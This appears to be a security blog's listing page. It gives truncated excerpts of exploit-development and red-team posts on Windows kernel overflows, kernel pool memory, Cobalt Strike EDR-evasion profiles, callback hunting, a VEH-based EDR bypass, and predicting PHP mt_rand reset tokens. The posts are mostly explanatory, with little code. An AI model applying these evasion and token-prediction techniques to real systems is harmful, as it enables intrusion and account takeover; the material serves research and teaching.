Understanding Integer Overflow in Windows Kernel Exploitation
In this blog post, we will explore integer overflows in Windows kernel drivers and cover how arithmetic operations can lead to security vulnerabilities. We will analyze real-world cases, build a custom vulnerable driver, and demonstrate how these flaws can impact memory allocations and system stability.

What is Integer Overflow in the Kernel?

Integer overflow occurs when an arithmetic operation exceeds the maximum value a data type can hold, causing it to wrap around. In the Windows kernel, integer overflows can lead to memory corruption, buffer overflows, or incorrect size calculations in kernel allocations, often resulting in heap corruption, out-of-bounds writes, and bug checks (AKA "blue screen of death" or BSOD). These vulnerabilities can arise in multiple ways. Before we dive into integer overflow vulnerabilities in the Windows kernel, let's first understand data types and how they work in memory.

Understanding Data Types

When working with low-level programming in C and C++, especially in Windows kernel and user-mode applications, choosing the right data type is critical. A wrong choice can lead to integer overflows, memory corruption, privilege escalation, and serious security vulnerabilities. To make things easier, I've put together a cheat sheet that you can refer back to whenever you're analyzing a kernel driver or a user-mode application for potential bugs. This table gives you a quick overview of how different data types store values and where things can go wrong. Use this as your go-to reference when hunting for integer overflows, wraparounds, and other dangerous bugs in kernel and user-mode applications.
| Data Type | Size (x64/x86) | Signed Range | Unsigned Range | Used In |
|---|---|---|---|---|
| char | 1 byte | -128 to 127 | 0 to 255 | User & Kernel |
| unsigned char | 1 byte | N/A | 0 to 255 | User & Kernel |
| signed char | 1 byte | -128 to 127 | N/A | User & Kernel |
| short | 2 bytes | -32,768 to 32,767 | 0 to 65,535 | User & Kernel |
| unsigned short | 2 bytes | N/A | 0 to 65,535 | User & Kernel |
| signed short | 2 bytes | -32,768 to 32,767 | N/A | User & Kernel |
| int | 4 bytes | -2,147,483,648 to 2,147,483,647 | 0 to 4,294,967,295 | User & Kernel |
| unsigned int | 4 bytes | N/A | 0 to 4,294,967,295 | User & Kernel |
| signed int | 4 bytes | -2,147,483,648 to 2,147,483,647 | N/A | User & Kernel |
| long (Windows) | 4 bytes (x86/x64) | -2,147,483,648 to 2,147,483,647 | 0 to 4,294,967,295 | User & Kernel |
| unsigned long | 4 bytes | N/A | 0 to 4,294,967,295 | User & Kernel |
| signed long | 4 bytes | -2,147,483,648 to 2,147,483,647 | N/A | User & Kernel |
| long long | 8 bytes | -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 | 0 to 18,446,744,073,709,551,615 | User & Kernel |
| unsigned long long | 8 bytes | N/A | 0 to 18,446,744,073,709,551,615 | User & Kernel |
| signed long long | 8 bytes | -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 | N/A | User & Kernel |
| SIZE_T | 8 bytes (x64) / 4 bytes (x86) | N/A | 0 to 18,446,744,073,709,551,615 (x64) / 0 to 4,294,967,295 (x86) | User & Kernel |
| SSIZE_T | 8 bytes (x64) / 4 bytes (x86) | -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 (x64) / -2,147,483,648 to 2,147,483,647 (x86) | N/A | User & Kernel |
| ULONG | 4 bytes | N/A | 0 to 4,294,967,295 | User & Kernel |
| ULONGLONG | 8 bytes | N/A | 0 to 18,446,744,073,709,551,615 | User & Kernel |
| DWORD | 4 bytes | N/A | 0 to 4,294,967,295 (same as unsigned int) | User & Kernel |
| NTSTATUS | 4 bytes | Varies (signed) | N/A | Kernel Only |
| HANDLE | Pointer-sized: 8 bytes (x64) / 4 bytes (x86) | N/A (opaque pointer) | N/A (opaque pointer) | User & Kernel |

The table above provides a comprehensive reference for both user-mode and kernel-mode data types, covering their sizes, ranges, and potential overflow scenarios.
This information is based on official Microsoft documentation on Windows and kernel-mode data types, and it serves as a valuable resource for identifying vulnerabilities related to integer overflows in kernel drivers.

Common Data Types That Can Cause Integer Overflow in the Kernel

| Data Type | Size | Signed/Unsigned | Range | Overflow Type |
|---|---|---|---|---|
| ULONG | 4 bytes | Unsigned | 0 to 4,294,967,295 (0xFFFFFFFF) | Unsigned wraparound |
| LONG | 4 bytes | Signed | -2,147,483,648 to 2,147,483,647 | Signed overflow |
| ULONG64 | 8 bytes | Unsigned | 0 to 18,446,744,073,709,551,615 | Large value overflow |
| LONG64 | 8 bytes | Signed | -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 | Signed overflow |
| SIZE_T | 4 bytes (x86) / 8 bytes (x64) | Unsigned | Platform-dependent | Unsigned wraparound |
| SSIZE_T | 4 bytes (x86) / 8 bytes (x64) | Signed | Platform-dependent | Signed overflow |
| LONG_PTR | 4 bytes (x86) / 8 bytes (x64) | Signed | Platform-dependent | Pointer arithmetic overflow |
| INT64 | 8 bytes | Signed | Same as LONG64 | Multiplication overflow |

Network Packet Overflow in Custom Windows Kernel Drivers (Addition ULONG Overflow)

I am demonstrating a custom Windows kernel driver that simulates the processing of network packets. To understand the vulnerability, let's first discuss ULONG and its range. In Windows, ULONG is a 32-bit unsigned integer, meaning it can hold values from 0x00000000 (0 in decimal) to 0xFFFFFFFF (4,294,967,295 in decimal). Since it cannot store negative values, any arithmetic operation that exceeds 0xFFFFFFFF causes an integer overflow, wrapping the value back to a much smaller number instead of continuing to increase. This behavior is the root cause of the vulnerability in my custom driver.

The vulnerable function in this custom driver takes a user-supplied packet size and adds 0x1000 to determine how much memory to allocate for storing the packet. However, if an attacker provides a large value like 0xFFFFFFFF, adding 0x1000 causes an integer wraparound, meaning instead of a large allocation, the kernel ends up allocating a much smaller buffer than expected.
For example, 0xFFFFFFFF + 0x1000 wraps around to 0x00000FFF, allocating only 4,095 bytes instead of the intended large buffer.

Triggering the Bug: Integer Wraparound in Packet Allocation

I created a simple PoC (proof of concept) to trigger the vulnerable line in the driver. The function takes a user-supplied packet size and adds 0x1000 for memory allocation. However, providing a large value like 0xFFFFFFFF causes an integer wraparound, resulting in a much smaller allocation (0x00000FFF instead of the intended large buffer), leading to a crash.

The crash occurred at movntps xmmword ptr [rcx-10h], xmm0, attempting to write beyond the allocated buffer at rcx = ffff860d714f1010, which is already out of bounds of the 0x1000-byte allocation at RAX. This confirms an out-of-bounds memory write due to the integer overflow in the allocation size calculation.

Packet Size Overflow in Custom Windows Kernel Drivers (Signed Integer Overflow Long)

I am demonstrating a custom Windows kernel driver that simulates the processing
Harnessing the Power of Cobalt Strike Profiles for EDR Evasion – Part 2
This blog post is a continuation of the previous entry, "Harnessing the Power of Cobalt Strike Profiles for EDR Evasion", in which we covered the malleable profile aspects of Cobalt Strike and its role in security solution evasion. Since the release of version 4.9, Cobalt Strike has introduced a number of significant updates aimed at improving operator flexibility, evasion techniques, and custom beacon implementation. In this post, we'll dive into the latest features and enhancements, examining how they impact tradecraft and integrate into modern adversary simulation workflows. We will build an OPSEC-safe malleable C2 profile that incorporates the latest best practices and features. All code and scripts referenced throughout this post are available on our GitHub repository.

CS 4.9 – Post-Exploitation DLLs

Cobalt Strike 4.9 introduces a new malleable C2 option, post-ex.cleanup. This option specifies whether or not to clean up the post-exploitation reflective loader memory when the DLL is loaded. Our initial attempt was to extract the post-exploitation DLLs from within the Cobalt Strike JAR file. Upon checking for strings, nothing was detected, as the DLLs are encrypted. When checking the documentation, we stumbled upon the POSTEX_RDLL_GENERATE hook. This hook takes place when the beacon is tasked to perform a post-exploitation task such as keylogging, taking a screenshot, running Mimikatz, etc. According to the documentation, the raw post-ex DLL binary is passed as the second argument, so we created a simple script to save its value to disk. Load the CNA script into the Cobalt Strike client and task the beacon to perform a post-exploitation task (in this case, a screenshot). Tasking the beacon with all the possible post-exploitation tasks provided us with all 10 post-ex DLLs. After extracting the DLLs, we searched for the strings within them.
We came up with the following set of profile configuration options (shortened for readability) to prevent any potential static detection. The full profile with all the found strings can be found here. Note: it is highly recommended to replace the plaintext strings with something meaningful to the operator, since the changes will be output during or after the post-exploitation job. For example, in the image below we modified the strings to show them in reverse during a port scan.

Beacon Data Store

The Beacon data store allows stored items to be executed multiple times without having to resend the item. The default data store size is 16 entries, although this can be modified by configuring the stage.data_store_size option within your malleable C2 profile to match your needs.

WinHTTP Support

Even though there is a new profile option to set a default internet library, we will not be including it in our profile. The reason is that both libraries are heavily monitored by security solutions, and there is no difference in terms of evasion between them. What matters is a good red team infrastructure that bypasses network and memory detection. However, if you prefer to use a specific library (in this case winhttp.dll), the following option can be applied to the profile.

CS 4.10 – BeaconGate

BeaconGate is a feature that instructs Beacon to intercept supported API calls via a custom Sleep Mask. This allows the developer to implement advanced evasion techniques without having to gain control over Beacon's API calls through IAT hooking in a UDRL, a method that is both complex and difficult to execute. It is recommended that you configure the profile to proxy all 23 functions that Cobalt Strike currently supports (as of 4.11). This can be done by setting the new stage.beacon_gate malleable C2 option, as demonstrated below. The profile will also enable the use of BeaconGate, which we will start playing with later.
Enabling this option is crucial; otherwise, the changes will not be applied to exported Beacons. To get started, we need to work with the Sleepmask-VS project from Fortra's repository. If you prefer a Linux environment for development, you can use the Artifact Kit template instead. The BeaconGateWrapper function in /library/gate.cpp is where these API calls are handled. The following demo code checks if the VirtualAlloc function is called. This enables us to intercept the execution flow and add the evasion mechanism(s). The same can be applied to all the other supported high-level API functions.

In this example, we are going to implement a callback spoofing mechanism. Since the goal of this blog is to explain how the BeaconGate implementation works, we will use HulkOperator's code for the spoofing mechanism. The custom SetupConfig function expects a function pointer to spoof. This can be achieved by utilizing the functionCall structure. The functionPtr field holds the pointer to the WinAPI function you want to hook. To access the function's name, you can use functionCall->function, and for the number of arguments, use functionCall->numOfArgs. Individual argument values can be retrieved via functionCall->args[i]. Here's a proof of concept showing how the final code looks. The next time you export a Beacon, the spoofing mechanism will be applied. The final implementation code can be found here.

CS 4.11 – Novel Process Injection

Cobalt Strike 4.11 introduced a custom process injection technique, ObfSetThreadContext. This injection technique bypasses the modern detection of injected threads (where the start address of a thread is not backed by a Portable Executable image on disk) by making use of various gadgets to redirect execution.
By default, this new option will automatically set the injected thread's start address to the (legitimate) remote image entry point, but it can additionally be configured with a custom module and offset, as shown below. The option above sets ObfSetThreadContext as the default process injection technique. The next injection technique serves as a backup when the default one fails, which happens in certain cases (e.g., x86 -> x64 injection, self-injection, etc.).

CS 4.11 – sRDI with evasion capabilities

According to Fortra, version 4.11 ports Beacon's default reflective loader to a new prepend/sRDI-style loader with several new evasive features added. sRDI enables the transformation of DLL files into position-independent shellcode. It functions as a comprehensive PE loader, handling correct section permissions, TLS callbacks, and various integrity
Windows Kernel Buffer Overflow
In this blog post, we will explore buffer overflows in Windows kernel drivers. We'll begin with a brief discussion of user-to-kernel interaction via IOCTL (input/output control) requests, which often serve as an entry point for these vulnerabilities. Next, we'll delve into how buffer overflows occur in kernel-mode code, examining different types such as stack overflow, heap overflow, memset overflow, memcpy overflow, and more. Finally, we'll analyze real-world buffer overflow cases and demonstrate potential exploitation in vulnerable drivers.

Understanding IOCTL in Windows Kernel Drivers

When working with Windows kernel drivers, understanding communication between user-mode applications and kernel-mode drivers is crucial. One common way to achieve this is through IOCTL (input/output control). IOCTL allows user-mode applications to send commands and data to drivers using the DeviceIoControl() function. In the kernel, these requests are received as I/O Request Packets (IRPs), specifically handled in the driver's IRP_MJ_DEVICE_CONTROL function. The driver processes the IRP, performs the requested action, and optionally returns data to the user-mode application. We won't dive too deep into the details, but we'll cover the basics of IOCTL and how it functions through a simple driver example. This diagram is sourced from MatteoMalvica.

Breaking Down IOCTL and IRP in a Custom Driver

Define a Custom IOCTL

The line highlighted in red defines a custom IOCTL (input/output control) code using the CTL_CODE macro, which is used by both user-mode applications and kernel-mode drivers to communicate.

Handling IOCTL Requests (IRP_MJ_DEVICE_CONTROL)

In the driver, IOCTL requests are handled inside the IOCTL function, which is assigned to IRP_MJ_DEVICE_CONTROL. Before calling DeviceIoControl(), a user-mode application must first obtain a handle to the driver using CreateFile().
This handle is necessary to communicate with the driver and ensures that the IOCTL request is sent to the correct device. The handle is passed to DeviceIoControl() with a code and buffer, which is processed by the function specified by IRP_MJ_DEVICE_CONTROL (in this case, the IOCTL function).

Retrieving IRP Details

Inside the IOCTL function, the driver extracts details about the request using IoGetCurrentIrpStackLocation(Irp). The Irp->AssociatedIrp.SystemBuffer parameter is used to access the user-mode buffer because that's where the I/O manager places the buffer passed in. Meanwhile, irpSp->Parameters.DeviceIoControl.InputBufferLength provides the size of the received data, ensuring we handle it correctly. The stack pointer irpSp (retrieved using IoGetCurrentIrpStackLocation(Irp)) gives access to request-specific parameters, keeping buffer handling separate from other IRP structures to prevent memory corruption.

Custom Function

The IOCTL function processes user-mode requests sent via DeviceIoControl(). It checks the IOCTL code, retrieves the user buffer, and prints the received message if data is available. Finally, it sets the status and completes the request.

Sending an IOCTL from User Mode to a Kernel Driver

This simple program communicates with a Windows kernel driver by issuing an IOCTL (input/output control) request. It begins by opening a handle to the driver (\\.\Hello) and then transmits data using DeviceIoControl with the IOCTL_PROC_DATA code. If the operation succeeds, the driver processes the input; otherwise, an error message is displayed. Finally, the program closes the device handle and terminates.

Running the User-Mode Application to Communicate with the Driver

In our previous blog post, we explored kernel debugging and how to load a custom driver. Now, it's time to run the user-mode application we just created. Once everything is set up, execute the .exe file, and we should see the message appear in DebugView or WinDbg.
I'll try to demonstrate this using DebugView to show how the communication works between user mode and kernel mode. Strange! As you can see in the image, the IOCTL code in user mode appears as 0x222000, but in kernel mode, it shows up as 0x800. This happens due to how CTL_CODE generates the full 32-bit IOCTL value. You can decode the IOCTL using OSR's IOCTL Decoder tool: OSR Online IOCTL Decoder.

Buffer Overflow

A buffer overflow happens when more data is written to a buffer than it can hold, causing it to overflow into adjacent memory. Example: imagine a glass designed to hold 250ml of water. If you pour 500ml, the extra water spills over, just like excess data spilling into unintended memory areas, potentially causing crashes or security vulnerabilities.

Memory Allocation in Kernel Drivers and Buffer Overflow Risks

In kernel driver development, proper memory management is even more critical than in user mode, as there is no exception handling to recover from faults. When memory operations are not handled carefully, they can lead to buffer overflows, causing severe security vulnerabilities such as kernel crashes, privilege escalation, and even arbitrary code execution. For this article, I have developed a custom vulnerable driver to demonstrate how buffer overflows occur in kernel mode. Before diving into exploitation, let's first explore the common memory allocation and manipulation functions used in Windows kernel drivers. Understanding these functions will help us identify how overflows happen and why they can be exploited.

Understanding Kernel Memory Allocation & Vulnerabilities

Memory allocation in kernel-mode drivers typically involves dynamically requesting memory from system pools or handling buffers passed from user-mode applications. Below are some common kernel memory allocation functions:

1. Heap-Based Buffer Overflow

Here, the driver allocates memory from the NonPagedPool and copies user-supplied data into it using RtlCopyMemory without checking the buffer size.
If the input is too large, it overflows into adjacent memory, corrupting the kernel heap.

Example Vulnerability: Heap Overflow in a Custom Driver

Impact: memory is allocated using ExAllocatePoolWithTag(NonPagedPool, 128, 'WKL'), but RtlCopyMemory copies inputLength bytes without validation, leading to a heap overflow if inputLength is greater than 128.

2. Stack-Based Buffer Overflow

Here, the driver copies data from a user-supplied buffer to a small stack buffer using RtlCopyMemory, without verifying whether the destination buffer is large enough. If the input size is too large, it overwrites stack memory, potentially leading to system crashes or arbitrary code execution.

Example Vulnerability: Stack Overflow in a Custom Driver

Impact: a small stack buffer, stackBuffer[100], is used, and RtlCopyMemory copies user data without checking if inputLength exceeds 100 bytes, causing a stack overflow.

3. Overwriting Memory with Memset

Here, the driver fills a kernel buffer with a fixed value using memset, but
Understanding Windows Kernel Pool Memory
This blog covers Windows pool memory from scratch, including memory types, debugging in WinDbg, and analyzing pool tags. We'll also use a custom tool to enumerate pool tags effortlessly and explore the segment heap. This is the first post in our VR (Vulnerability Research) & XD (Exploit Development) series, laying the foundation for heap overflows, pool spraying, and advanced kernel exploitation.

What is the Windows Kernel Pool?

The Windows Kernel Pool is a memory region used by the Windows kernel and drivers to store system-critical structures. In short, the Kernel Pool is the kernel-land version of the user-mode "heap". Unlike user-mode memory, the kernel pool is shared across all processes, meaning any corruption in the kernel pool can crash the entire system (BSOD).

Pool Internals

Essentially, chunks that are allocated and in use, or kept free, are housed on either a pageable or a non-pageable page. This distinction gives rise to the two pool types: the paged pool and the non-paged pool. To sum up, in order to take advantage of a heap corruption vulnerability such as a use-after-free (UAF), a researcher will make a distinction as to whether it is a UAF on the non-paged pool or a UAF on the paged pool. This is important because the paged pool and non-paged pool are different heaps, meaning they are separate locations in memory. Different object structures can be placed on the non-paged pool or the paged pool, respectively, and to replace the freed chunk with one of them, one must first trigger the use-after-free event.

Setting Up Kernel Debugging

To get started with kernel debugging, you need to set up a Windows VM and configure it using the following admin commands. Typically, this setup requires two machines: a debuggee system, which is our target Windows machine, and a debugger system, from which we will be issuing debug commands.
For basic debugging, you can use local kernel debugging (lkd) on a single system. If you haven't installed the tools yet, you can download the Windows Debugging Tools from Microsoft's official website. Now, on your base machine, start WinDbg and enter the port number and key. After that, restart the virtual machine. The following screenshot shows kernel debugging on the virtual machine.

First, if we want a basic view of pool memory in kernel debugging, we can use the !vm 1 command in WinDbg. This provides a detailed summary of system memory usage, including information about paged pool and non-paged pool allocations. Here, 157 KB represents the current available memory in the system, while 628 KB shows the total committed memory, meaning memory that has been allocated and is in use. This helps in analyzing memory consumption and potential allocation issues in kernel debugging. If you want to explore further, you can use the !vm 2 command in WinDbg. This provides a more detailed breakdown of memory usage across different pool types and memory zones compared to !vm 1.

Windows provides the API ExAllocatePoolWithTag, which is the primary API used for pool allocations in kernel mode. Drivers use this to allocate dynamic memory, similar to how malloc works in user mode. Note: while ExAllocatePoolWithTag has been deprecated in favor of ExAllocatePool2, it is still widely used in existing drivers, so we will examine this function. Later, I will show in detail how to develop a kernel driver using ExAllocatePoolWithTag. Here's a short explanation of the key parameters used in Windows pool memory allocation. There's more than one kind of _POOL_TYPE; if you want to explore more, you can check out Microsoft's documentation. We are only focusing on paged pool, non-paged pool, and pool tag.
It is also worth mentioning that every chunk of memory on a pool has a dedicated pool header structure inline in front of the allocation, which we will examine shortly in WinDbg. Now let's use the !pool <address> command in WinDbg to analyze a specific memory address. We want to display details about a pool allocation, including its PoolType, PoolTag, BlockSize, and owning process/module. As we can see in the screenshot above, the memory allocation is categorized as paged pool. The details also tell us whether the page is 'Allocated' or free, and we can discover the pool tag; sometimes the details will also give the binary name, driver name, and other information. Feel free to explore.

So, the question arises: how do we find the address of a pool allocation? It's actually quite simple! If we check the documentation, we can see that ExAllocatePoolWithTag is a function provided by NtosKrnl.exe (the Windows kernel). This means we can set breakpoints in WinDbg to track memory allocations in real time. So first let's examine the API with the command x /D nt!ExAlloca* in the debugger and then set a breakpoint. Let's set a breakpoint at that specific address and see if it gets triggered. As shown below, we're using the bp <address> command. As soon as we resume our debugger with the g (Go) command, it will automatically hit the breakpoint, and we can view the information gathered from the registers. In WinDbg, when analyzing a call to ExAllocatePoolWithTag, you can check the registers to understand the allocation request. By monitoring these values, you can determine how drivers allocate memory and track specific pool tags in the kernel. We will also examine the rax register, but first step out of the function using gu. Now, let's use !pool <address>. But isn't this strange? We were looking for the tag NDNB. Here's a handy tip: to find more interesting data, use the command !pool @rax 2.

What is a Pool Tag?
A Pool Tag is a four-character identifier that helps track memory allocations in Windows kernel pools (PagedPool, NonPagedPool, etc.). Every time memory is allocated using APIs like ExAllocatePoolWithTag, a pool tag is assigned to identify the allocation’s origin. This is useful for debugging memory leaks, analysing kernel memory
HuntingCallbacks – Enumerating the Entire system32
What are Callbacks?

Certain Windows APIs support passing a function pointer as one of their parameters. This parameter is then called when a particular event is triggered or a scenario takes place. Either way, this is usually user-controlled and can be abused from an offensive perspective by passing a malicious function or shellcode. Some of the popularly known callbacks are EnumChildWindows, RegisterClass, etc. There has been much research on the topic of callbacks, where they have been abused for call stack evasion, sleep timers, evasion from memory scanners, DLL loading and execution, etc. In this blog post, we try to uncover previously unknown callbacks that could be abused maliciously and produce a tool for the same. In this research, we aim to show how various static analysis methods can be used to create and automate the discovery of previously unknown scenarios and details, and we hope to see more similar contributions in the future.

Overview

There are two main types of branching in most assembly languages: direct and indirect. Windows APIs that support callback opportunities usually take in a function pointer address (or a structure, as you will see) as one of their function arguments. The prototype of such a function usually is of the format below. To find a potential function that allows the user to send in a callback function pointer, it needs to satisfy two conditions. As mentioned above, indirect calls are usually compiled to call reg, where reg is any of the registers. But since this research is focused on scanning through multiple Windows DLLs, we need to accommodate Control Flow Guard, or CFG.

Control Flow Guard

CFG, in a very simple sense, is a protection mechanism that is placed at compile time within Windows executables to prevent malicious indirect calls that could be abused using ROP and other memory corruption bugs.
Most, if not all, of the DLLs we will be scanning are compiled with Control Flow Guard, meaning any function pointer passed through a potential function will not result in a call reg signature. As shown in the following picture, when CFG is enabled, the callee is passed via the RAX register to a wrapper function called __guard_xfg_dispatch_icall_fptr. This function takes the RAX register and performs the call. The function __guard_xfg_dispatch_icall_fptr is just a wrapper for a number of other sub-functions, which eventually boil down to _guard_dispatch_icall_nop. This function is the final wrapper around the instruction jmp rax, where the control flow is redirected toward the user-controlled function pointer. This gives us our plan to scan for potential target Windows APIs that support a callback opportunity. Note: some functions have certain checks and verifications that will need to be passed in order to have code reachability towards the CFG dispatch. While executing those potential target functions, the user might need to pass in other parameters or sometimes initialize structures.

Prepping Miasm

To implement my scanning idea, I chose to go with the Miasm framework because it contains many of the features needed to overengineer the solution. There are several alternatives that could be used that would perhaps be faster or offer a more efficient solution, but coming from a CTF background, Miasm seemed to be the simplest and most appropriate choice, although the concepts described could very well be applied with other tools. Miasm is a reverse engineering framework that supports symbolic execution and contains its own lifter and IR. It supports use-def graphs, an in-built disassembler, a PE loader, and an emulator, among other features. Each of these features will be necessary down the line.
Before we proceed to scan every function, we need to initialize a number of things with Miasm that will be queried as we move forward. First, we start by reading the file and passing it to the PE container, which is defined by the ContainerPE class. The file data that was read can be passed to the function Container.from_string(data, loc_key), whose return value will be the ContainerPE class. Since we are going to scan an entire directory, we need to check whether the files we are scanning are DLLs (some executables also have exported functions, but that is for a future update). We check if the file we read is a DLL by parsing the Characteristics field from its COFF header. If the Characteristics field contains the IMAGE_FILE_DLL flag, then we can be mostly sure that we are dealing with a DLL. We then proceed to extract all the functions in the export table of the DLL.

Miasm uses an object called LocationDB() that, simply speaking, keeps track of symbol names and the corresponding offsets of those symbols within the binary. This is sort of like a separate database populated whenever a new symbol for an offset is defined in the binary. Since the Import Address Table (IAT) contains symbols that we will need to check against, we need to populate the loc_db by adding their details and corresponding offsets within the binary. This can be performed by parsing the IAT and retrieving both the offset and the symbol using Miasm's in-built functions. Once all the previously mentioned objects and details are initialized, we can proceed to the core part of the hunt to find the potential target functions.

Hunting for Indirect Function Calls

In some DLLs, we notice that exported APIs behave as a proxy call to some other DLL; these functions are usually not in the .text section.
Attempting to disassemble these exported APIs will obviously raise an exception, since there is no actual code block to be disassembled and the exported API is merely a proxy call. Hence, to prevent the tool from crashing midway, we need to add a check that identifies whether the address of the exported API we are scanning lies within the .text section and the section carries the flags 0x60000020. This can be implemented as follows:

We then initialize the disassembly engine of Miasm and
LayeredSyscall – Abusing VEH to Bypass EDRs
Asking any offensive security researcher how an EDR could be bypassed will result in one of many possible answers, such as removing hooks, direct syscalls, indirect syscalls, etc. In this blog post, we will take a different perspective and abuse Vectored Exception Handlers (VEH) as a foundation to produce a legitimate thread call stack and employ indirect syscalls to bypass user-land EDR hooks. Disclaimer: The research below must only be used for ethical purposes. Please be responsible and do not use it for anything illegal. This is for educational purposes only. Introduction EDRs use user-land hooks that are usually placed in ntdll.dll, or sometimes in kernel32.dll, both of which are loaded into every process in the Windows operating system. They implement their hooking procedure typically in one of two ways: Hooks are not placed in every function within the target DLL. Within ntdll.dll, most of the hooks are placed in the Nt* syscall wrapper functions. These hooks are often used to redirect execution safely to the EDR’s DLL, which examines the parameters to determine whether the process is performing any malicious actions. Some popular bypasses for circumventing these hooks are: There are more bypass techniques, such as blocking any unsigned DLL from being loaded, blocking the EDR’s DLL from being loaded by monitoring LdrLoadDll, etc. On the flip side, there are detection strategies that could be employed to detect and perhaps prevent the above-mentioned evasion techniques: The research presented below attempts to address the above detection strategies. LayeredSyscall – Overview The general idea is to generate a legitimate call stack before performing the indirect syscall while switching modes to kernel land, and also to support up to 12 arguments. Additionally, the call stack could be of the user’s choice, with the assumption that one of the stack frames satisfies the size requirement for the number of arguments of the intended Nt* syscall.
The implemented concept could also allow the user to produce not only the legitimate call stack but also the indirect syscall in between the user’s chosen Windows API, if needed. Vectored Exception Handler (VEH) is used to give us control over the context of the CPU without raising any alarms. Since exception handlers are not widely attributed to malicious behavior, they give us access to hardware breakpoints, which will be abused to act as hooks. Of note, the call stack generation mentioned here is not constructed by the tool or by the user, but rather performed by the system, with no need for unwinding operations of our own or separate allocations in memory. This means the call stack could be changed by simply calling another Windows API if detections for one are present. VEH Handler #1 – AddHwBp We register the first handler, which sets up hardware breakpoints at two key areas: the syscall opcode and the ret opcode, both within the Nt* syscall wrappers in ntdll.dll. The handler is registered to handle EXCEPTION_ACCESS_VIOLATION, which is generated by the tool just before the actual syscall takes place. This could be done in many ways, but we’ll use a basic read of a null pointer to generate the exception. However, since we must support any syscall the user could call, we need a generic approach to setting the breakpoints. We can implement a wrapper function that takes one argument and proceeds to trigger the exception. The handler can then retrieve the address of the Nt* function by accessing the RCX register, which holds the first argument passed to the wrapper function. Once retrieved, we perform a memory scan to find the offsets where the syscall opcode and the ret opcode (just after the syscall opcode) are located. We can do this by checking that the opcodes 0x0F and 0x05 are adjacent to each other, as in the code below.
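The referenced scan isn’t reproduced in this excerpt; a minimal Python sketch of the idea (the tool performs the equivalent scan natively inside the handler, so the function name here is illustrative) could be:

```python
def find_syscall_and_ret(stub: bytes):
    """Scan an Nt* stub for the `syscall` opcode pair (0F 05) immediately
    followed by `ret` (C3). Returns (syscall_offset, ret_offset), or
    (None, None) if the pattern is absent."""
    for i in range(len(stub) - 2):
        if stub[i] == 0x0F and stub[i + 1] == 0x05 and stub[i + 2] == 0xC3:
            return i, i + 2
    return None, None
```

Those two offsets are exactly where the handler then plants the Dr0 and Dr1 hardware breakpoints.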
Syscalls in Windows, as seen in the following screenshot, are constructed from the opcodes 0x0F and 0x05. Two bytes after the start of the syscall, you can find the ret opcode, 0xC3. Hardware breakpoints are set using the registers Dr0, Dr1, Dr2, and Dr3, while Dr6 reports breakpoint status and Dr7 holds the flags that enable and configure each of those registers. The handler uses Dr0 and Dr1 to set the breakpoints at the syscall and ret offsets. As seen in the code below, we enable them by writing to ExceptionInfo->ContextRecord->Dr0 or Dr1. We also set bits 0 and 2 of the Dr7 register (the L0 and L1 local-enable flags) to tell the processor that the breakpoints in Dr0 and Dr1 are enabled. As you can see in the image below, the exception is thrown because we are trying to read a null pointer address. Once the exception is thrown, the handler takes charge and places the breakpoints. Note that once the exception is triggered, it is necessary to advance RIP by the number of bytes needed to step past the opcode that generated the exception; in this case, it was 2 bytes. After that, the CPU continues execution, and these breakpoints act as our hooks. We will see this in action in the second handler below. VEH Handler #2 – HandlerHwBp This handler contains three major parts: Part #1 – Handling the Syscall Breakpoint When hardware breakpoints are hit, the system generates the exception code EXCEPTION_SINGLE_STEP, which we check for to handle our breakpoints. First in the control flow, we check whether the exception was generated at the Nt* syscall start using ExceptionInfo->ExceptionRecord->ExceptionAddress, which points to the address where the exception was generated. We proceed to save the context of the CPU at the time the exception was generated.
This allows us to query the stored arguments, which, according to the Microsoft x64 calling convention, are passed in RCX, RDX, R8, and R9; it also allows us to use the RSP register to query the rest of the arguments, which will be explained further later. Once stored, we can change RIP to point to our demo function; in
Exploiting (GH-13690) mt_rand in PHP in 2024
This blog post delves into the inner workings of mt_rand(), exposing its weaknesses and demonstrating how these vulnerabilities can be exploited. We’ll examine real-world scenarios and provide insights into more secure alternatives. What is mt_rand in PHP? This function generates a random value via the Mersenne Twister Random Number Generator (PHP 4, PHP 5, PHP 7, PHP 8). It helps the developer by generating random numbers, but is it actually random? Based on the PHP documentation [1], the answer is no: There is a tool developed by Openwall called php_mt_seed [2]. The tool receives a handful of the rand outputs and gives you the seed that was used. What are the attack scenarios? There are two: As an example of the first scenario, let’s imagine an admin feature on a website powered by PHP that resets multiple users’ passwords at the same time. A link is sent to the selected users to reset their passwords, and that link contains a reset token generated by rand. If one of those users were an attacker, the attacker could retrieve the seed and predict the tokens for the other users, since the seed is the same for all of them. As an example of the second scenario, we have a website powered by PHP 8.0.30, or any PHP version vulnerable to GH-13690. An attacker can request a password reset for their own account and another account at the same moment (two different HTTP requests). The attacker can then use their own token to predict the seed for the other account. The seed will be different, because the rand function regenerates the seed for every HTTP request, but it can be brute forced using the exploit for GH-13690.
(Global Mt19937 is not properly reset in-between requests when MT_RAND_PHP is used) Figure 2 – PHP 8 change log In both scenarios, we are exploiting the following function, which was found in a real application: Exploiting Scenario 1 Vulnerable code: In the example, the function generates a password reset token for two users within the same session (the same initial state for mt_rand). Our target runs the latest PHP version: Let’s attack the tokens. We need to predict the second token (the admin token, for example) using only one of the generated tokens (a normal user’s token). The following Python script converts the tokens into the values the rand function actually generated, because the rand function generates numbers, not the strings themselves: The output of the script is then used with the php_mt_seed tool: The values “0” and “61” appear in the script because the original PHP code bounds the rand call between 0 and 61, and we duplicate each number so the tool searches for an exact match. Now let’s get the next token using the following exploit PHP code, setting the seed: Here is the example output for the target PHP code: Here we’ve run the exploit PHP code: The attack was successful and we obtained the token. Exploiting Scenario 2 In this scenario, user1 is the attacker who wants to reset the password for user2, and the website is running a vulnerable PHP version such as 8.0.30 (GH-13690). We are going to attack an application that uses the same function mentioned above. We installed the application on PHP version 8.0.30. To exploit the issue, we need to send the password reset requests for the attacker account and the target account at the same time. To do this, we can create a request group in Burp Suite’s Repeater. Make sure to enable the Send group (single connection) option as below: Using the MySQL database, we can see that tokens were generated for the attacker account and the target account at the same time.
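The Python conversion script itself isn’t shown in this excerpt. Here is a sketch of what it plausibly does, assuming a 62-character alphanumeric charset in the order digits, lowercase, uppercase — an assumption; the exact character order must match the charset used by the target’s PHP code:

```python
# Assumed charset: index 0-9 are digits, 10-35 lowercase, 36-61 uppercase
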